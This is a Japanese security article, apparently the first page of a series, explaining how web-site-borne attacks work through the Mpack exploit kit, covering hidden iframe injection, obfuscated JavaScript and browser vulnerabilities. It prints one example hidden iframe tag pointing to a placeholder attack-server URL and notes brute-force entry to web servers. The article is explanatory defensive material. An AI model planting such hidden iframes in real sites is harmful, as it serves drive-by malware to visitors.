6月下旬から7月上旬にかけて、Mpack(※1)というWebサイト攻撃コード詰め合わせパックとでも言うべきツールが話題となった。Mpackそのものが危険であるように紹介されていることもあるが、実際はそうではない。Mpackは2006年から存在が確認されており、またMpackで悪用されている脆弱性は既知のものである。ただし、Mpackは最近主流となっている、Webサイト経由の攻撃の特徴をよく表していると言える。Mpackの事例を見ることで、Webサイト経由の攻撃がどのようなものであるか見ていくこととする。

※1: PandaLabsが公開している資料がMpack について、詳しく解説している(PDF)

最近のWebサイト経由の攻撃

最近のWebサイト経由の攻撃の特徴は、大きく3つ挙げられる。

  1. Web サイトに攻撃コードを取得するiframeタグを挿入する
  2. 攻撃コードがJavaScriptで書かれる。なお、この時のJavaScrtipコードは難読化(Obfuscation)されている
  3. 攻撃コードで悪用する脆弱性はブラウザ関連のものである

特徴 1

Webサイト経由の攻撃は、その多くがiframeタグをWebページに挿入することで実行される。挿入されたiframeタグはブラウザに表示されないように設定されている(下記にMpackサーバへのiframeタグの例を記載する)。

<IFRAME name='StatPage' src='Mpack サーバのURL' width=5 height=5 style='display:none'>

Mpackの事例では、このiframeタグの挿入がFTPブルートフォースにより実行されたとの考察がある点も興味深い。Mpackの事例では、短期間で数千サイトにMpackサーバにアクセスするiframeタグが挿入されたことが確認されている。

一部ではCross Site Scripting (XSS)を悪用することで、iframeタグが挿入されたとされているが、挿入されたWebサイトには、シンプルな構成のWebサイトもあることから、XSSでiframeタグが挿入されたとは考えにくい。各SOCからの統計レポート(※2)でも、FTPまたはSSHブルートフォース攻撃は多く検知されていることから、ブルートフォース攻撃でWebサーバに侵入されてiframeタグが挿入されたことは納得できる。iframeタグの挿入については、Webサイトそのものの脆弱性ではなく、Webサーバそのもののセキュリティに問題があったと言える。

※2:
JSOC 侵入傾向分析レポート Vol.8(PDF)
ISS SOC情報分析四半期レポート 2007年第1四半期(ダイジェスト版) (PDF)
ISS SOC情報分析四半期レポート 2006年第4四半期(ダイジェスト版) (PDF)

次のページでは2つ目の特徴である「難読化」について解説する。